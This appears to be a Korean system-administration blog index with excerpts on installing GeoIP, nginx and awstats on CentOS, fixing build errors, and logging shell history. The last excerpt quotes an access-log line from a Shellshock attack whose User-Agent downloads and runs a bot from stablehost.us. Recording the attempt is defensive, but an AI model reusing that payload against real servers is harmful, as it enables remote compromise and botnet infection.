admin 2014.11.19 centos6 apache2 geoip (mod_geoip2) apache geoip2 설치 o/s : centos 6.5 64bit apache : 2.2 wget mirror.koreaidc.com/geoip/geoip-api-mod_geoip2-1.2.9.tar.gz tar xvfz geoip-api-mod_geoip2-1.2.9.tar.gz cd geoip-api-mod_geoip2-1.2.9 /usr/local/apache/bin/apxs -i -a -L/usr/local/include -I/usr/local/lib -lGeoIP -c mod_geoip.c mkdir /var/geoip 최신파일 다운로드 wget http://geolite.maxmind.com/download/geoip/database/GeoLiteCountry/GeoIP.dat.gz wget... Read More..
admin 2014.11.18 configure: error: Cannot find libmysqlclient_r under /usr/local/mysql. configure: error: Cannot find libmysqlclient_r under /usr/local/mysql. 이런 에러가 발생되는 경우 cd /usr/local/mysql ln -s lib lib64 echo “/usr/local/mysql/lib64” >> /etc/ld.so.conf 그리고 다시 컴파일 작업 Read More..
admin 2014.11.18 centos6 geoip install O/S : CentOS 6.x 1. epel yum repo에 추가 [crayon-673fc27ca8cef539013230/] 2.yum GeoIP install [crayon-673fc27ca8cf8109216533/] 3. 자료를 확인해 보면 최신 자료가 아닌 2018년도 자료가 마지막이다 [crayon-673fc27ca8cfc034233395/] 4. 최신 자료로 업데이트 진행은 아래 사이트에서 진행 GeoIP.dat GeoIPCity.dat 파일 업데이트 CentOS 6 (GeoLite2 이용한 geoip geoipcity 파일 최신 파일로 업데이트) Read More..
admin 2014.11.18 nginx 설치 ( centos 6.5) yum install pcre pcre-devel openssl openssl-devel wget http://nginx.org/download/nginx-1.5.13.tar.gz tar xvfz nginx-1.5.13.tar.gz cd nginx-1.5.13 ./configure –prefix=/usr/local/nginx –conf-path=/usr/local/nginx/nginx.conf –sbin-path=/usr/local/nginx/sbin/nginx –pid-path=/usr/local/nginx/log/nginx.pid –lock-path=/usr/local/nginx/log/nginx.lock –error-log-path=/usr/local/nginx/log/error.log –user=no... Read More..
admin 2014.11.07 BEGIN failed–compilation aborted centos perl 실행시 에러 yum install perl-ExtUtils-CBuilder perl-ExtUtils-MakeMaker perl -MCPAN -e shell 실행 에러시 yum -y install perl-Shell-Perl Read More..
admin 2014.11.03 nginx Access-Control-Allow-Origin * vi nginx.conf location ~* ^.*\.(ico|css|js|gif|jp?g|png|svg|bmp|eot|ttf|woff|otf|woff2){ add_header Access-Control-Allow-Origin “*”; access_log off; expires max; # break; } vi mime.type [crayon-673fc27ca9a0c092378551/] Read More..
+ admin 2014.10.08 awstats 설치 웹로그 분석 시스템은 다양은 오픈소스가 존재 한다. webalizer / awstats / goaccess 등 여러가지 존재하는데 이중에서 awstats 를 설치 해보자 OS : CentOS 7.x Web Server : apache 2.4 1. 다운로드 ( 다운로드는 공식 홈페이지에서 다운로드 가능 https://awstats.sourceforge.io/ ) 및 폴더 변경 [crayon-673fc27caa40e874678757/] 2. 사용자 환경 config 파일 생성 [crayon-673fc27caa416411309866/] 3. awstats 환경설정 파일 수정 [crayon-673fc27caa41a650785029/] 4. 이제 모든 설정이 완료되었으므로 로그 파일을 awstats 에 맞게 파싱... Read More..
admin 2014.10.01 history 로그로 남기기 간혹 엔지니어 중에 history 를 수정하거나 삭제 한 후 자기 자신은 작업을 하지 않았다는 등 ㅜㅜ 그러한 이유로 작업자의 ip 및 명령어를 로그에 남기도록 해보자 vi /etc/profile ####### sulinux 2014 command history function history_to_syslog { declare command remoteaddr=”who am i” command=$(fc -ln -0) if [ “$command” != “$old_command” ]; then logger -p local1.notice -t bash -i ? “$USER : $remoteaddr” : “$command” fi ... Read More..
+ admin 2014.09.29 bash 웹을 이용한 서버 해킹 시도 218.145.31.50 219.232.239.33 – – [29/Sep/2014:08:48:15 +0900] “GET / HTTP/1.0” 200 238 “-” “() { :;}; /bin/bash -c \”wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\”” 218.145.31.50 – Read More..